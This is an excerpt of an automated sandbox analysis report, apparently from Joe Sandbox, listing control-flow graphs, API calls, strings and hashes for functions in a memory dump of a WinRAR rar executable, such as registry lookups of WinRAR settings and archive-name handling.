7ff629b341fc-7ff629b34202 729->733 735 7ff629b34585-7ff629b34589 731->735 736 7ff629b34525-7ff629b3452b 731->736 737 7ff629b343d0-7ff629b343e0 call 7ff629b3a580 732->737 738 7ff629b34214-7ff629b3425c 732->738 733->728 733->732 739 7ff629b3458b-7ff629b3458f 735->739 740 7ff629b345a3-7ff629b345d4 call 7ff629b33884 735->740 742 7ff629b345db-7ff629b345de 736->742 743 7ff629b34531-7ff629b34539 736->743 754 7ff629b343e6-7ff629b34414 call 7ff629b3a9e8 call 7ff629b5172c 737->754 755 7ff629b344f0-7ff629b34503 737->755 744 7ff629b34261-7ff629b34264 738->744 739->740 746 7ff629b34591-7ff629b34597 739->746 740->742 742->722 751 7ff629b345e0-7ff629b345e5 742->751 749 7ff629b3453b-7ff629b3453e 743->749 750 7ff629b34573-7ff629b3457a 743->750 752 7ff629b34268-7ff629b34270 744->752 746->742 757 7ff629b34599-7ff629b345a1 746->757 761 7ff629b3456a-7ff629b34571 749->761 762 7ff629b34540-7ff629b34543 749->762 756 7ff629b3457e-7ff629b34583 750->756 751->726 752->752 763 7ff629b34272-7ff629b34288 call 7ff629b51700 752->763 754->755 787 7ff629b3441a-7ff629b344a9 call 7ff629b3d840 call 7ff629b3a900 call 7ff629b3a8c4 call 7ff629b3a900 call 7ff629b515fc 754->787 755->728 756->742 757->742 758->759 759->653 761->756 767 7ff629b34561-7ff629b34568 762->767 768 7ff629b34545-7ff629b34548 762->768 777 7ff629b3428a-7ff629b34295 763->777 778 7ff629b342a3 763->778 767->756 773 7ff629b34558-7ff629b3455f 768->773 774 7ff629b3454a-7ff629b3454d 768->774 773->756 774->746 781 7ff629b3454f-7ff629b34556 774->781 777->778 783 7ff629b34297-7ff629b342a1 777->783 785 7ff629b342a7-7ff629b342be 778->785 781->756 783->785 785->744 788 7ff629b342c0-7ff629b342c2 785->788 821 7ff629b344ab-7ff629b344bb 787->821 822 7ff629b344bf-7ff629b344cf 787->822 790 7ff629b342e6 788->790 791 7ff629b342c4-7ff629b342d6 call 7ff629b3a900 788->791 790->737 794 7ff629b342ec 790->794 796 7ff629b342db-7ff629b342e1 791->796 797 7ff629b342f1-7ff629b342f7 794->797 799 7ff629b345d6 796->799 800 7ff629b342f9-7ff629b342fe 797->800 801 7ff629b34300-7ff629b34303 797->801 799->742 800->801 803 7ff629b34305-7ff629b34314 800->803 801->797 804 7ff629b34316-7ff629b34320 803->804 805 7ff629b3433d-7ff629b34347 803->805 807 7ff629b34323-7ff629b34327 804->807 808 7ff629b3434d-7ff629b34378 call 7ff629b3d840 805->808 809 7ff629b345ea-7ff629b345ef call 7ff629b4a774 805->809 807->805 811 7ff629b34329-7ff629b3433b 807->811 818 7ff629b3437a-7ff629b34399 call 7ff629b51764 808->818 819 7ff629b3439e-7ff629b343cb call 7ff629b3470c 808->819 809->722 811->805 811->807 818->796 819->796 821->822 825 7ff629b344d2-7ff629b344d8 822->825 828 7ff629b344da-7ff629b344e5 825->828 829 7ff629b344eb-7ff629b344ee 825->829 828->799 828->829 829->825
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamesnprintfwcschr
                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                              • API String ID: 602362809-1645646101
                                                              • Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                              • Instruction ID: 8161c213a3807916885d82d8e2f9e4e9db2a875abd41e443791f49462544cdd8
                                                              • Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                              • Instruction Fuzzy Hash: 2122C322A1868A86EF20DF25DC402FF2361FF86785F814135EA4EC76D5EE2CE544E746
                                                              Function 00007FF629B04FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1405 7ff629b04fd0-7ff629b0502d call 7ff629b4a5a0 1408 7ff629b0502f-7ff629b05037 1405->1408 1409 7ff629b0504d-7ff629b05055 1405->1409 1408->1409 1410 7ff629b05039-7ff629b0504b call 7ff629b4c8a0 1408->1410 1411 7ff629b0506e-7ff629b05089 call 7ff629b2420c 1409->1411 1412 7ff629b05057-7ff629b05069 call 7ff629b0481c 1409->1412 1410->1409 1410->1412 1418 7ff629b0509f-7ff629b050b6 call 7ff629b3db08 1411->1418 1419 7ff629b0508b-7ff629b0509d call 7ff629b3a9c0 1411->1419 1412->1411 1424 7ff629b0511b-7ff629b05131 call 7ff629b4c8a0 1418->1424 1425 7ff629b050b8-7ff629b050c3 call 7ff629b3a59c 1418->1425 1419->1424 1430 7ff629b05203-7ff629b0520d call 7ff629b3aa48 1424->1430 1431 7ff629b05137-7ff629b0513e 1424->1431 1425->1424 1432 7ff629b050c5-7ff629b050cf call 7ff629b13054 1425->1432 1440 7ff629b05212-7ff629b0521c 1430->1440 1433 7ff629b05140-7ff629b05167 call 7ff629b23f98 1431->1433 1434 7ff629b0516c-7ff629b051be call 7ff629b3aa1c call 7ff629b3aa48 call 7ff629b36e98 1431->1434 1432->1424 1441 7ff629b050d1-7ff629b05107 call 7ff629b3a9e8 call 7ff629b3a9c0 call 7ff629b13054 1432->1441 1433->1434 1490 7ff629b051d3-7ff629b051e8 call 7ff629b37a24 1434->1490 1443 7ff629b05222 1440->1443 1444 7ff629b052db-7ff629b052e0 1440->1444 1441->1424 1516 7ff629b05109-7ff629b05116 call 7ff629b3a9e8 1441->1516 1449 7ff629b0532f-7ff629b05332 1443->1449 1450 7ff629b05228-7ff629b0522d 1443->1450 1445 7ff629b05453-7ff629b05477 call 7ff629b0f00c call 7ff629b0f230 call 7ff629b0f09c 1444->1445 1446 7ff629b052e6-7ff629b052e9 1444->1446 1509 7ff629b0547c-7ff629b05483 1445->1509 1455 7ff629b052ef-7ff629b052f2 1446->1455 1456 7ff629b05379-7ff629b05382 1446->1456 1453 7ff629b05334 1449->1453 1454 7ff629b0533b-7ff629b0533e 1449->1454 1450->1449 1451 7ff629b05233-7ff629b05236 1450->1451 1459 7ff629b05290-7ff629b05299 1451->1459 1460 7ff629b05238-7ff629b0523b 1451->1460 1453->1454 1464 7ff629b05340 1454->1464 1465 7ff629b05347-7ff629b05358 call 7ff629af1230 call 7ff629af4858 1454->1465 1466 7ff629b052f4-7ff629b052f7 1455->1466 1467 7ff629b0536c-7ff629b05374 call 7ff629b381cc 1455->1467 1462 7ff629b05449-7ff629b05451 call 7ff629b2eab8 1456->1462 1463 7ff629b05388-7ff629b0538b 1456->1463 1480 7ff629b052b2-7ff629b052bd 1459->1480 1481 7ff629b0529b-7ff629b0529e 1459->1481 1471 7ff629b05274-7ff629b0528b call 7ff629af1230 call 7ff629af48ec 1460->1471 1472 7ff629b0523d-7ff629b05240 1460->1472 1462->1509 1476 7ff629b05391-7ff629b05397 1463->1476 1477 7ff629b0541b-7ff629b05433 call 7ff629b3ab1c 1463->1477 1464->1465 1524 7ff629b0535d 1465->1524 1466->1445 1479 7ff629b052fd-7ff629b05300 1466->1479 1467->1509 1541 7ff629b0535e-7ff629b05362 call 7ff629af14fc 1471->1541 1472->1445 1484 7ff629b05246-7ff629b05249 1472->1484 1495 7ff629b0540c-7ff629b05419 call 7ff629b254f8 call 7ff629b251e4 1476->1495 1496 7ff629b05399-7ff629b0539c 1476->1496 1477->1509 1523 7ff629b05435-7ff629b05447 call 7ff629b2bbd4 1477->1523 1479->1449 1497 7ff629b05302-7ff629b05305 1479->1497 1489 7ff629b052ce-7ff629b052d6 call 7ff629b255e0 1480->1489 1492 7ff629b052bf-7ff629b052c9 call 7ff629b3a9e8 1480->1492 1488 7ff629b052a0-7ff629b052a6 1481->1488 1481->1489 1484->1449 1501 7ff629b0524f-7ff629b05252 1484->1501 1506 7ff629b05313-7ff629b0531d call 7ff629b0481c 1488->1506 1507 7ff629b052a8-7ff629b052ad call 7ff629b07214 1488->1507 1489->1509 1543 7ff629b051c0-7ff629b051ce call 7ff629b3aa48 1490->1543 1544 7ff629b051ea-7ff629b05201 call 7ff629b36f68 call 7ff629af14c0 1490->1544 1492->1489 1495->1509 1513 7ff629b053ef-7ff629b05401 call 7ff629b045c8 1496->1513 1514 7ff629b0539e-7ff629b053a1 1496->1514 1498 7ff629b05322-7ff629b0532a call 7ff629b167e0 1497->1498 1499 7ff629b05307-7ff629b0530a 1497->1499 1498->1509 1499->1445 1515 7ff629b05310 1499->1515 1501->1445 1518 7ff629b05258-7ff629b0525b 1501->1518 1506->1509 1507->1509 1529 7ff629b05485-7ff629b0548c call 7ff629b08444 1509->1529 1530 7ff629b05491-7ff629b054bc call 7ff629b4a610 1509->1530 1513->1495 1514->1506 1528 7ff629b053a7-7ff629b053d5 call 7ff629b045c8 call 7ff629b3ab1c 1514->1528 1515->1506 1516->1424 1534 7ff629b0525d-7ff629b05260 1518->1534 1535 7ff629b0526b-7ff629b05272 1518->1535 1523->1509 1524->1541 1528->1509 1560 7ff629b053db-7ff629b053ea call 7ff629b2ba9c 1528->1560 1529->1530 1534->1498 1548 7ff629b05266 1534->1548 1535->1489 1555 7ff629b05367 1541->1555 1543->1490 1544->1440 1548->1515 1555->1509 1560->1509
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: wcschr
                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                              • API String ID: 1497570035-1281034975
                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                              • Instruction ID: aa73b7c0323c4aa3b414b6632a164384388990c6da47d0e8f1547e2e0cbc4ec8
                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                              • Instruction Fuzzy Hash: F6C1B561A1C68A41EF24AF368E551FE2251EFC7B86F444135D94ECBADADE6CE500E303
                                                              Function 00007FF629B37F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1564 7ff629b37f24-7ff629b37f5c 1565 7ff629b37fd0 1564->1565 1566 7ff629b37f5e-7ff629b37f64 1564->1566 1568 7ff629b37fd7-7ff629b37fea 1565->1568 1566->1565 1567 7ff629b37f66-7ff629b37f7c call 7ff629b3b3f0 1566->1567 1578 7ff629b37f7e-7ff629b37fb3 GetProcAddressForCaller GetProcAddress 1567->1578 1579 7ff629b37fb5 1567->1579 1570 7ff629b38036-7ff629b38039 1568->1570 1571 7ff629b37fec-7ff629b37fef 1568->1571 1572 7ff629b3805c-7ff629b38065 GetCurrentProcessId 1570->1572 1575 7ff629b3803b-7ff629b3804a 1570->1575 1571->1572 1573 7ff629b37ff1-7ff629b38000 1571->1573 1576 7ff629b38077-7ff629b38093 1572->1576 1577 7ff629b38067 1572->1577 1585 7ff629b38005-7ff629b38007 1573->1585 1584 7ff629b3804f-7ff629b38051 1575->1584 1582 7ff629b38069-7ff629b38075 1577->1582 1583 7ff629b37fbc-7ff629b37fce 1578->1583 1579->1583 1582->1576 1582->1582 1583->1568 1584->1576 1586 7ff629b38053-7ff629b3805a 1584->1586 1585->1576 1587 7ff629b38009 1585->1587 1588 7ff629b38010-7ff629b38034 call 7ff629b0ca6c call 7ff629b0cda4 call 7ff629b0ca40 1586->1588 1587->1588 1588->1576
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                              • API String ID: 1389829785-2207617598
                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                              • Instruction ID: a6f110799d4c9c245db3dc7160ac68d1cb02eaf2a897cb33ed63e2d9b08d0a3e
                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                              • Instruction Fuzzy Hash: 87416A21A08A8F92FE04CF22AD405BE6760BBDABD6F084135CC5D87B54DE6CE445A306
                                                              Function 00007FF629B4B0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                              • String ID:
                                                              • API String ID: 552178382-0
                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                              • Instruction ID: 550618c8203608b9d62088f207d803e6a01c4381e66cecb2415813e4a25695b1
                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                              • Instruction Fuzzy Hash: A9313A25E0825B81FE14AF65AC613BF2391AFC7786F446039DB0D87293DE2CA404BA43
                                                              Function 00007FF629B34774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B347DB
                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B34831
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B34853
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B348A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                              • String ID: LanguageFolder$Software\WinRAR\General
                                                              • API String ID: 1800380464-3408810217
                                                              • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                              • Instruction ID: 42c24c7243c440396f70a326605627deeab1340046850c1c771157b0a0a7997d
                                                              • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                              • Instruction Fuzzy Hash: FF318F22B18A8A82EF50DF65EC142EF6351FFC6795F405231EE4D86B99EE6CD108DB01
                                                              Function 00007FF629B24398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B243D1
                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B24402
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B2440D
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B2443E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseFileModuleNameOpenQueryValue
                                                              • String ID: AppData$Software\WinRAR\Paths
                                                              • API String ID: 3617018055-3415417297
                                                              • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                              • Instruction ID: 63719af3fa7ba5164a17af5c5646927db59b864b90a8391fb66a9e55821a62f4
                                                              • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                              • Instruction Fuzzy Hash: 7C119022A1874A81EE109F22E8005AF7361FFCABC5F441135EA4E47A59DF3CE104E701
                                                              Function 00007FF629AF7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1715 7ff629af7a5b-7ff629af7a5e 1716 7ff629af7a60-7ff629af7a66 1715->1716 1717 7ff629af7a68 1715->1717 1716->1717 1718 7ff629af7a6b-7ff629af7a7c 1716->1718 1717->1718 1719 7ff629af7a7e-7ff629af7a81 1718->1719 1720 7ff629af7aa8 1718->1720 1721 7ff629af7a83-7ff629af7a86 1719->1721 1722 7ff629af7a88-7ff629af7a8b 1719->1722 1723 7ff629af7aab-7ff629af7ab8 1720->1723 1721->1720 1721->1722 1724 7ff629af7aa4-7ff629af7aa6 1722->1724 1725 7ff629af7a8d-7ff629af7a90 1722->1725 1726 7ff629af7aba-7ff629af7abd 1723->1726 1727 7ff629af7ac8-7ff629af7acb 1723->1727 1724->1723 1725->1720 1728 7ff629af7a92-7ff629af7a99 1725->1728 1726->1727 1729 7ff629af7abf-7ff629af7ac6 1726->1729 1730 7ff629af7acf-7ff629af7ad1 1727->1730 1728->1724 1731 7ff629af7a9b-7ff629af7aa2 1728->1731 1729->1730 1732 7ff629af7ad3-7ff629af7ae6 1730->1732 1733 7ff629af7b2a-7ff629af7bb0 call 7ff629b11d34 call 7ff629af3f04 1730->1733 1731->1720 1731->1724 1735 7ff629af7b0a-7ff629af7b27 1732->1735 1736 7ff629af7ae8-7ff629af7af2 call 7ff629b09be0 1732->1736 1744 7ff629af7bb2-7ff629af7bba 1733->1744 1745 7ff629af7bbc 1733->1745 1735->1733 1740 7ff629af7af7-7ff629af7b02 1736->1740 1740->1735 1744->1745 1746 7ff629af7bbf-7ff629af7bc9 1744->1746 1745->1746 1747 7ff629af7bda-7ff629af7c06 call 7ff629afb540 1746->1747 1748 7ff629af7bcb-7ff629af7bd5 call 7ff629b11e1c 1746->1748 1752 7ff629af7c40 1747->1752 1753 7ff629af7c08-7ff629af7c0f 1747->1753 1748->1747 1755 7ff629af7c44-7ff629af7c5a call 7ff629afaa68 1752->1755 1753->1752 1754 7ff629af7c11-7ff629af7c14 1753->1754 1754->1752 1756 7ff629af7c16-7ff629af7c2b 1754->1756 1761 7ff629af7c85-7ff629af7c97 call 7ff629afb540 1755->1761 1762 7ff629af7c5c-7ff629af7c6a 1755->1762 1756->1755 1758 7ff629af7c2d-7ff629af7c3e call 7ff629b49b98 1756->1758 1758->1755 1766 7ff629af7c9c-7ff629af7c9f 1761->1766 1762->1761 1764 7ff629af7c6c-7ff629af7c7e call 7ff629af8d98 1762->1764 1764->1761 1768 7ff629af7fa4-7ff629af7fbe 1766->1768 1769 7ff629af7ca5-7ff629af7cfb call 7ff629b29354 call 7ff629b16378 * 2 1766->1769 1777 7ff629af7cfd-7ff629af7d10 call 7ff629af5414 1769->1777 1778 7ff629af7d17-7ff629af7d1f 1769->1778 1777->1778 1780 7ff629af7d25-7ff629af7d28 1778->1780 1781 7ff629af7de2-7ff629af7de6 1778->1781 1780->1781 1785 7ff629af7d2e-7ff629af7d36 1780->1785 1783 7ff629af7e4e-7ff629af7e68 call 7ff629b29958 1781->1783 1784 7ff629af7de8-7ff629af7e49 call 7ff629b298dc 1781->1784 1795 7ff629af7e6a-7ff629af7e84 1783->1795 1796 7ff629af7e8b-7ff629af7e8e 1783->1796 1784->1783 1788 7ff629af7d38-7ff629af7d49 call 7ff629b4a444 1785->1788 1789 7ff629af7d59-7ff629af7d6a call 7ff629b4a444 1785->1789 1797 7ff629af7d4b-7ff629af7d56 call 7ff629b18ae8 1788->1797 1798 7ff629af7d57 1788->1798 1801 7ff629af7d6c-7ff629af7d77 call 7ff629b1cf8c 1789->1801 1802 7ff629af7d78-7ff629af7dc6 1789->1802 1795->1796 1799 7ff629af7e90-7ff629af7e9a call 7ff629b29990 1796->1799 1800 7ff629af7e9f-7ff629af7eb8 call 7ff629af1204 1796->1800 1797->1798 1798->1802 1799->1800 1812 7ff629af7ec8-7ff629af7ed9 call 7ff629b2941c 1800->1812 1801->1802 1802->1781 1822 7ff629af7dc8-7ff629af7de1 call 7ff629af1314 call 7ff629b4ba34 1802->1822 1817 7ff629af7eba-7ff629af7ec3 call 7ff629b29680 1812->1817 1818 7ff629af7edb-7ff629af7f9f call 7ff629af1400 call 7ff629b16424 call 7ff629afb540 1812->1818 1817->1812 1818->1768 1822->1781
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
